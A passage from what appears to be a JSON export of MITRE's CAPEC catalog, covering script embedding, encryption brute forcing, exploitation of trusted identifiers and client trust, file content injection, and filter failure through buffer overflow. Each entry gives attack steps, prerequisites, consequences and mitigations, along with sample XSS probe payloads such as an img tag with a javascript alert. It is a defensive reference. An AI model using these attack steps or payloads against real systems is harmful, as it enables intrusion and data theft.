sends document information to the attacker.","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute appropriately."]},{"Step":"4","Phase":"Exploit","Description":"[Forceful browsing] When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user\'s current network (Internet or not).","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and performs actions on the same web site","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities)."]},{"Step":"5","Phase":"Exploit","Description":"[Content spoofing] By manipulating the content, the attacker targets the information that the user would like to get from the website.","Technique":"Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and exposes attacker-modified invalid information to the user on the current web page."}]},"Prerequisites":{"Prerequisite":"The target client software must allow the execution of scripts generated by remote hosts."},"Skills_Required":{"Skill":["To achieve a redirection and use of less trusted source, an adversary can simply edit content such as XML payload or HTML files that are sent to client machine.",{"Level":"Low"},"Exploiting a client side vulnerability to inject malicious scripts into the browser\'s executable process.",{"Level":"High"}]},"Resources_Required":{"Resource":"Ability to include malicious script in document, e.g. HTML file, or XML document. Ability to deploy a custom hostile service for access by targeted clients. Ability to communicate synchronously or asynchronously with client machine"},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["In addition to the traditional input fields, all other user controllable inputs, such as image tags within messages or the likes, must also be subjected to input validation. Such validation should ensure that content that can be potentially interpreted as script by the browser is appropriately filtered.","All output displayed to clients must be properly escaped. Escaping ensures that the browser interprets special scripting characters literally and not as script to be executed."]},"Example_Instances":{"Example":{"p":["An online discussion forum allows its members to post HTML-enabled messages, which can also include image tags. A malicious user embeds JavaScript in the IMG tags in their messages that gets executed within the victim\'s browser whenever the victim reads these messages.","When executed within the victim\'s browser, the malicious script could accomplish a number of adversary objectives including stealing sensitive information such as usernames, passwords, or cookies."],"div":["<img src=javascript:alert(\'XSS\')>",{"style":"margin-left:10px;","class":"attack"}]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"80"}},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Examples-Instances, Related_Attack_Patterns, Related_Vulnerabilities, Related_Weaknesses, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow"}],"Previous_Entry_Name":["Embedding Scripts in Non-Script Elements",{"Date":"2017-05-01"}]}},"19":{"ID":"19","Name":"Embedding Scripts within Scripts","Abstraction":"Standard","Status":"Stable","Description":"An attack of this type exploits a programs\' vulnerabilities that are brought on by allowing remote hosts to execute scripts. The adversary leverages this capability to execute their own script by embedding it within other scripts that the target software is likely to execute. The adversary must have the ability to inject their script into a script that is likely to be executed. If this is done, then the adversary can potentially launch a variety of probes and attacks against the web server\'s local environment, in many cases the so-called DMZ, back end resources the web server can communicate with, and other hosts. With the proliferation of intermediaries, such as Web App Firewalls, network devices, and even printers having JVMs and Web servers, there are many locales where an attacker can inject malicious scripts. Since this attack pattern defines scripts within scripts, there are likely privileges to execute said attack on the host. These attacks are not solely limited to the server side, client side scripts like Ajax and client side JavaScript can contain malicious scripts as well.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"242"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Spider] Using a browser or an automated tool, an attacker records all entry points for inputs that happen to be reflected in a client-side script element. These script elements can be located in the HTML content (head, body, comments), in an HTML tag, XML, CSS, etc.","Technique":["Use a spidering tool to follow and record all non-static links that are likely to have input parameters (through forms, URL, fragments, etc.) actively used by the Web application.","Use a proxy tool to record all links visited during a manual traversal of the web application.","Use a browser to manually explore the website and analyze how it is constructed. Many browsers\' plugins are available to facilitate the analysis or automate the discovery."]},{"Step":"2","Phase":"Experiment","Description":"[Probe identified potential entry points for XSS vulnerability] The attacker uses the entry points gathered in the \\"Explore\\" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.","Technique":["Manually inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a client-side script elements context and observe system behavior to determine if script was executed.","Manually inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a server-side script elements context and observe system behavior to determine if script was executed.","Use an automated injection attack tool to inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a client-side script elements context and observe system behavior to determine if script was executed.","Use an automated injection attack tool to inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a server-side script elements context and observe system behavior to determine if script was executed.","Use a proxy tool to record results of the created requests."]},{"Step":"3","Phase":"Exploit","Description":"[Steal session IDs, credentials, page content, etc.] As the attacker succeeds in exploiting the vulnerability, they can choose to steal user\'s credentials in order to reuse or to analyze them later on.","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and sends document information to the attacker.","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute appropriately."]},{"Step":"4","Phase":"Exploit","Description":"[Forceful browsing] When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user\'s current network (Internet or not).","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and performs actions on the same web site","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities)."]},{"Step":"5","Phase":"Exploit","Description":"[Content spoofing] By manipulating the content, the attacker targets the information that the user would like to get from the website.","Technique":"Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and exposes attacker-modified invalid information to the user on the current web page."}]},"Prerequisites":{"Prerequisite":"Target software must be able to execute scripts, and also grant the adversary privilege to write/upload scripts."},"Skills_Required":{"Skill":["To load malicious script into open, e.g. world writable directory",{"Level":"Low"},"Executing remote scripts on host and collecting output",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Use browser technologies that do not allow client side scripting.","Utilize strict type, character, and encoding enforcement.","Server side developers should not proxy content via XHR or other means. If a HTTP proxy for remote content is setup on the server side, the client\'s browser has no way of discerning where the data is originating from.","Ensure all content that is delivered to client is sanitized against an acceptable content specification.","Perform input validation for all remote content.","Perform output validation for all remote content.","Disable scripting languages such as JavaScript in browser","Session tokens for specific host","Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this.","Privileges are constrained, if a script is loaded, ensure system runs in chroot jail or other limited authority mode"]},"Example_Instances":{"Example":[{"p":["Ajax applications enable rich functionality for browser based web applications. Applications like Google Maps deliver unprecedented ability to zoom in and out, scroll graphics, and change graphic presentation through Ajax. The security issues that an attacker may exploit in this instance are the relative lack of security features in JavaScript and the various browser\'s implementation of JavaScript, these security gaps are what XSS and a host of other client side vulnerabilities are based on. While Ajax may not open up new security holes, per se, due to the conversational aspects between client and server of Ajax communication, attacks can be optimized. A single zoom in or zoom out on a graphic in an Ajax application may round trip to the server dozens of times. One of the first steps many attackers take is frequently footprinting an environment, this can include scanning local addresses like 192.*.*.* IP addresses, checking local directories, files, and settings for known vulnerabilities, and so on.","The XSS script that is embedded in a given IMG tag can be manipulated to probe a different address on every click of the mouse or other motions that the Ajax application is aware of.","In addition the enumerations allow for the attacker to nest sequential logic in the attacks. While Ajax applications do not open up brand new attack vectors, the existing attack vectors are more than adequate to execute attacks, and now these attacks can be optimized to sequentially execute and enumerate host environments."],"div":["<IMG SRC=javascript:alert(\'XSS\')>",{"style":"margin-left:10px;","class":"informative"}]},"~/.bash_profile and ~/.bashrc are executed in a user\'s context when a new shell opens or when a user logs in so that their environment is set correctly. ~/.bash_profile is executed for login shells and ~/.bashrc is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), ~/.bash_profile is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, ~/.bashrc is executed. This allows users more fine grained control over when they want certain commands executed. These files are meant to be written to by the local user to configure their own environment; however, adversaries can also insert code into these files to gain persistence each time a user logs in or opens a new shell."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1546.004","Entry_Name":"Event Triggered Execution:.bash_profile and .bashrc"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, References, Related_Attack_Patterns, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Examples-Instances, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Execution_Flow, Taxonomy_Mappings"}]}},"20":{"ID":"20","Name":"Encryption Brute Forcing","Abstraction":"Standard","Status":"Draft","Description":"An attacker, armed with the cipher text and the encryption algorithm used, performs an exhaustive (brute force) search on the key space to determine the key that decrypts the cipher text to obtain the plaintext.","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"112"},{"Nature":"CanPrecede","CAPEC_ID":"668"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"Determine the ciphertext and the encryption algorithm."},{"Step":"2","Phase":"Experiment","Description":"Perform an exhaustive brute force search of the key space, producing candidate plaintexts and observing if they make sense."}]},"Prerequisites":{"Prerequisite":["Ciphertext is known.","Encryption algorithm and key size are known."]},"Skills_Required":{"Skill":["Brute forcing encryption does not require much skill.",{"Level":"Low"}]},"Resources_Required":{"Resource":{"p":["A powerful enough computer for the job with sufficient CPU, RAM and HD. Exact requirements will depend on the size of the brute force job and the time requirement for completion. Some brute forcing jobs may require grid or distributed computing (e.g. DES Challenge).","On average, for a binary key of size N, 2^(N/2) trials will be needed to find the key that would decrypt the ciphertext to obtain the original plaintext.","Obviously as N gets large the brute force approach becomes infeasible."]}},"Indicators":{"Indicator":"None. This attack happens offline."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["Use commonly accepted algorithms and recommended key sizes. The key size used will depend on how important it is to keep the data confidential and for how long.","In theory a brute force attack performing an exhaustive key space search will always succeed, so the goal is to have computational security. Moore\'s law needs to be taken into account that suggests that computing resources double every eighteen months."]},"Example_Instances":{"Example":"In 1997 the original DES challenge used distributed net computing to brute force the encryption key and decrypt the ciphertext to obtain the original plaintext. Each machine was given its own section of the key space to cover. The ciphertext was decrypted in 96 days."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"326"},{"CWE_ID":"327"},{"CWE_ID":"693"},{"CWE_ID":"1204"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns, Related_Weaknesses"}}},"21":{"ID":"21","Name":"Exploitation of Trusted Identifiers","Abstraction":"Meta","Status":"Stable","Description":{"p":["An adversary guesses, obtains, or \\"rides\\" a trusted identifier (e.g. session ID, resource ID, cookie, etc.) to perform authorized actions under the guise of an authenticated user or service. Attacks leveraging trusted identifiers typically result in the adversary laterally moving within the local network, since users are often allowed to authenticate to systems/applications within the network using the same identifier. This allows the adversary to obtain sensitive data, download/install malware on the system, pose as a legitimate user for social engineering purposes, and more.","Attacks on trusted identifiers take advantage of the fact that some software accepts user input without verifying its authenticity. Many server side processes are vulnerable to these attacks because the server to server communications have not been analyzed from a security perspective or the processes \\"trust\\" other systems because they are behind a firewall. Similarly, servers that use easy to guess or spoofable schemes for representing digital identity can also be vulnerable. Such systems frequently use schemes without cryptography and digital signatures (or with broken cryptography). Identifiers may be guessed or obtained due to insufficient randomness, poor protection (passed/stored in the clear), lack of integrity (unsigned), or improper correlation with access control policy enforcement points. Exposed configuration and properties files that contain sensitive data may additionally provide an adversary with the information needed to obtain these identifiers. An adversary may also \\"ride\\" an identifier via a malicious link, as is the case in Cross Site Request Forgery (CSRF) attacks.","Regardless of the attack vector, successful spoofing and impersonation of trusted credentials can lead to an adversary breaking authentication, authorization, and audit controls with the target system or application."]},"Likelihood_Of_Attack":"High","Typical_Severity":"High","Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the application for Indicators of Susceptibility] Using a variety of methods, until one is found that applies to the target, the adversary probes for cookies, session tokens, or entry points that bypass identifiers altogether.","Technique":["Spider all available pages","Attack known bad interfaces","Search outward-facing configuration and properties files for identifiers."]},{"Step":"2","Phase":"Experiment","Description":"[Fetch samples] The adversary fetches many samples of identifiers. This may be through legitimate access (logging in, legitimate connections, etc.) or via systematic probing.","Technique":["An adversary makes many anonymous connections and records the session IDs assigned.","An adversary makes authorized connections and records the session tokens or credentials issued.","An adversary gains access to (legitimately or illegitimately) a nearby system (e.g., in the same operations network, DMZ, or local network) and makes a connection from it, attempting to gain the same privileges as a trusted system."]},{"Step":"3","Phase":"Exploit","Description":"[Impersonate] An adversary can use successful experiments or authentications to impersonate an authorized user or system or to laterally move within a system or application"},{"Step":"4","Phase":"Exploit","Description":"[Spoofing] Malicious data can be injected into the target system or into a victim user\'s system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks."},{"Step":"5","Phase":"Exploit","Description":"[Data Exfiltration] The adversary can obtain sensitive data contained within the system or application."}]},"Prerequisites":{"Prerequisite":["Server software must rely on weak identifier proof and/or verification schemes.","Identifiers must have long lifetimes and potential for reusability.","Server software must allow concurrent sessions to exist."]},"Skills_Required":{"Skill":["To achieve a direct connection with the weak or non-existent server session access control, and pose as an authorized user",{"Level":"Low"}]},"Resources_Required":{"Resource":["Ability to deploy software on network.","Ability to communicate synchronously or asynchronously with server."]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authentication"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Design: utilize strong federated identity such as SAML to encrypt and sign identity tokens in transit.","Implementation: Use industry standards session key generation mechanisms that utilize high amount of entropy to generate the session key. Many standard web and application servers will perform this task on your behalf.","Implementation: If the identifier is used for authentication, such as in the so-called single sign on use cases, then ensure that it is protected at the same level of assurance as authentication tokens.","Implementation: If the web or application server supports it, then encrypting and/or signing the identifier (such as cookie) can protect the ID if intercepted.","Design: Use strong session identifiers that are protected in transit and at rest.","Implementation: Utilize a session timeout for all sessions, for example 20 minutes. If the user does not explicitly logout, the server terminates their session after this period of inactivity. If the user logs back in then a new session key is generated.","Implementation: Verify authenticity of all identifiers at runtime."]},"Example_Instances":{"Example":[{"p":["Thin client applications like web applications are particularly vulnerable to session ID attacks. Since the server has very little control over the client, but still must track sessions, data, and objects on the server side, cookies and other mechanisms have been used to pass the key to the session data between the client and server. When these session keys are compromised it is trivial for an adversary to impersonate a user\'s session in effect, have the same capabilities as the authorized user. There are two main ways for an adversary to exploit session IDs.","A brute force attack involves an adversary repeatedly attempting to query the system with a spoofed session header in the HTTP request. A web server that uses a short session ID can be easily spoofed by trying many possible combinations so the parameters session-ID= 1234 has few possible combinations, and an adversary can retry several hundred or thousand request with little to no issue on their side.","The second method is interception, where a tool such as wireshark is used to sniff the wire and pull off any unprotected session identifiers. The adversary can then use these variables and access the application."]},"For example, in a message queuing system that allows service requesters to post messages to its queue through an open channel (such as anonymous FTP), authorization is done through checking group or role membership contained in the posted message. However, there is no proof that the message itself, the information in the message (such group or role membership), or the process that wrote the message to the queue is authentic and authorized to do so."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"290"},{"CWE_ID":"302"},{"CWE_ID":"346"},{"CWE_ID":"539"},{"CWE_ID":"6"},{"CWE_ID":"384"},{"CWE_ID":"664"},{"CWE_ID":"602"},{"CWE_ID":"642"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1134","Entry_Name":"Access Token Manipulation"}},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Name, @Status, Consequences, Description, Example_Instances, Execution_Flow, Mitigations, Prerequisites, Resources_Required, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}],"Previous_Entry_Name":["Exploitation of Session Variables, Resource IDs and other Trusted Credentials",{"Date":"2015-11-09"},"Exploitation of Trusted Credentials",{"Date":"2020-07-30"}]}},"22":{"ID":"22","Name":"Exploiting Trust in Client","Abstraction":"Meta","Status":"Draft","Description":"An attack of this type exploits vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by communicating directly with the server where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Prerequisites":{"Prerequisite":"Server software must rely on client side formatted and validated values, and not reinforce these checks on the server side."},"Skills_Required":{"Skill":["The attacker must have fairly detailed knowledge of the syntax and semantics of client/server communications protocols and grammars",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Ability to communicate synchronously or asynchronously with server"},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Design: Ensure that client process and/or message is authenticated so that anonymous communications and/or messages are not accepted by the system.","Design: Do not rely on client validation or encoding for security purposes.","Design: Utilize digital signatures to increase authentication assurance.","Design: Utilize two factor authentication to increase authentication assurance.","Implementation: Perform input validation for all remote content."]},"Example_Instances":{"Example":["Web applications may use JavaScript to perform client side validation, request encoding/formatting, and other security functions, which provides some usability benefits and eliminates some client-server round-tripping. However, the web server cannot assume that the requests it receives have been subject to those validations, because an attacker can use an alternate method for crafting the HTTP Request and submit data that contains poisoned values designed to spoof a user and/or get the web server to disclose information.","Web 2.0 style applications may be particularly vulnerable because they in large part rely on existing infrastructure which provides scalability without the ability to govern the clients. Attackers identify vulnerabilities that either assume the client side is responsible for some security services (without the requisite ability to ensure enforcement of these checks) and/or the lack of a hardened, default deny server configuration that allows for an attacker probing for weaknesses in unexpected ways. Client side validation, request formatting and other services may be performed, but these are strictly usability enhancements not security enhancements.","Many web applications use client side scripting like JavaScript to enforce authentication, authorization, session state and other variables, but at the end of day they all make requests to the server. These client side checks may provide usability and performance gains, but they lack integrity in terms of the http request. It is possible for an attacker to post variables directly to the server without using any of the client script security checks and customize the patterns to impersonate other users or probe for more information.","Many message oriented middleware systems like MQ Series are rely on information that is passed along with the message request for making authorization decisions, for example what group or role the request should be passed. However, if the message server does not or cannot authenticate the authorization information in the request then the server\'s policy decisions about authorization are trivial to subvert because the client process can simply elevate privilege by passing in elevated group or role information which the message server accepts and acts on."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"290"},{"CWE_ID":"287"},{"CWE_ID":"20"},{"CWE_ID":"200"},{"CWE_ID":"693"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Description"}],"Previous_Entry_Name":["Exploiting Trust in Client (aka Make the Client Invisible)",{"Date":"2015-12-07"}]}},"23":{"ID":"23","Name":"File Content Injection","Abstraction":"Standard","Status":"Draft","Description":"An attack of this type exploits the host\'s trust in executing remote content, including binary files. The files are poisoned with a malicious payload (targeting the file systems accessible by the target software) by the adversary and may be passed through standard channels such as via email, and standard web content like PDF and multimedia files. The adversary exploits known vulnerabilities or handling routines in the target processes. Vulnerabilities of this type have been found in a wide variety of commercial applications from Microsoft Office to Adobe Acrobat and Apple Safari web browser. When the adversary knows the standard handling routines and can identify vulnerabilities and entry points, they can be exploited by otherwise seemingly normal content. Once the attack is executed, the adversary\'s program can access relative directories such as C:\\\\Program Files or other standard system directories to launch further attacks. In a worst case scenario, these programs are combined with other propagation logic and work as a virus.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"242"},{"Nature":"CanAlsoBe","CAPEC_ID":"165"}]},"Prerequisites":{"Prerequisite":["The target software must consume files.","The adversary must have access to modify files that the target software will consume."]},"Skills_Required":{"Skill":["How to poison a file with malicious payload that will exploit a vulnerability when the file is opened. The adversary must also know how to place the file onto a system where it will be opened by an unsuspecting party, or force the file to be opened.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}},"Mitigations":{"Mitigation":["Design: Enforce principle of least privilege","Design: Validate all input for content including files. Ensure that if files and remote content must be accepted that once accepted, they are placed in a sandbox type location so that lower assurance clients cannot write up to higher assurance processes (like Web server processes for example)","Design: Execute programs with constrained privileges, so parent process does not open up further vulnerabilities. Ensure that all directories, temporary directories and files, and memory are executing with limited privileges to protect against remote execution.","Design: Proxy communication to host, so that communications are terminated at the proxy, sanitizing the requests before forwarding to server host.","Implementation: Virus scanning on host","Implementation: Host integrity monitoring for critical files, directories, and processes. The goal of host integrity monitoring is to be aware when a security issue has occurred so that incident response and other forensic activities can begin."]},"Example_Instances":{"Example":{"p":"PHP is a very popular language used for developing web applications. When PHP is used with global variables, a vulnerability may be opened that affects the file system. A standard HTML form that allows for remote users to upload files, may also place those files in a public directory where the adversary can directly access and execute them through a browser. This vulnerability allows remote adversaries to execute arbitrary code on the system, and can result in the adversary being able to erase intrusion evidence from system and application logs."}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"20"}},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Examples-Instances, Payload_Activation_Impact"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Example_Instances, References"}],"Previous_Entry_Name":["File System Function Injection, Content Based",{"Date":"2015-12-07"}]}},"24":{"ID":"24","Name":"Filter Failure through Buffer Overflow","Abstraction":"Detailed","Status":"Draft","Description":"In this attack, the idea is to cause an active filter to fail by causing an oversized transaction. An attacker may try to feed overly long input strings to the program in an attempt to overwhelm the filter (by causing a buffer overflow) and hoping that the filter does not fail securely (i.e. the user input is let into the system unfiltered).","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"100"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey] The attacker surveys the target application, possibly as a valid and authenticated user","Technique":["Spidering web sites for inputs that involve potential filtering","Brute force guessing of filtered inputs"]},{"Step":"2","Phase":"Experiment","Description":"[Attempt injections] Try to feed overly long data to the system. This can be done manually or a dynamic tool (black box) can be used to automate this. An attacker can also use a custom script for that purpose.","Technique":["Brute force attack through black box penetration test tool.","Fuzzing of communications protocols","Manual testing of possible inputs with attack data."]},{"Step":"3","Phase":"Experiment","Description":"[Monitor responses] Watch for any indication of failure occurring. Carefully watch to see what happened when filter failure occurred. Did the data get in?","Technique":["Boron tagging. Choose clear attack inputs that are easy to notice in output. In binary this is often 0xa5a5a5a5 (alternating 1s and 0s). Another obvious tag value is all zeroes, but it is not always obvious what goes wrong if the null values get into the data.","Check Log files. An attacker with access to log files can look at the outcome of bad input."]},{"Step":"4","Phase":"Exploit","Description":"[Abuse the system through filter failure] An attacker writes a script to consistently induce the filter failure.","Technique":["DoS through filter failure. The attacker causes the system to crash or stay down because of its failure to filter properly.","Malicious code execution. An attacker introduces a malicious payload and executes arbitrary code on the target system.","An attacker can use the filter failure to introduce malicious data into the system and leverage a subsequent SQL injection, Cross Site Scripting, Command Injection or similar weakness if it exists."]}]},"Prerequisites":{"Prerequisite":"Ability to control the length of data passed to an active filter."},"Skills_Required":{"Skill":["An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS.",{"Level":"Low"},"Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.",{"Level":"High"}]},"Indicators":{"Indicator":"Many exceptions are thrown by the application\'s filter modules in a short period of time. Check the logs. See if the probes are coming from the same IP address."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"},{"Scope":"Availability","Impact":"Unreliable Execution"}]},"Mitigations":{"Mitigation":["Make sure that ANY failure occurring in the filtering or input validation routine is properly handled and that offending input is NOT allowed to go through. Basically make sure that the vault is closed when failure occurs.","Pre-design: Use a language or compiler that performs automatic bounds checking.","Pre-design through Build: Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.","Operational: Use OS-level preventative functionality. Not a complete solution.","Design: Use an abstraction library to abstract away risky APIs. Not a complete solution."]},"Example_Instances":{"Example":[{"div":["Attack Example: Filter Failure in Taylor UUCP Daemon",{"style":"color:#32498D; font-weight:bold;"}],"p":"Sending in arguments that are too long to cause the filter to fail open is one instantiation of the filter failure attack. The Taylor UUCP daemon is designed to remove hostile arguments before they can be executed. If the arguments are too long, however, the daemon fails to remove them. This leaves the door open for attack."},"A filter is used by a web application to filter out characters that may allow the input to jump from the data plane to the control plane when data is used in a SQL statement (chaining this attack with the SQL injection attack). Leveraging a buffer overflow the attacker makes the filter fail insecurely and the tainted data is permitted to enter unfiltered into the system, subsequently causing a SQL injection.","Audit Truncation and Filters with Buffer Overflow. Sometimes very large transactions can be used to destroy a log file or cause partial logging failures. In this kind of attack, log 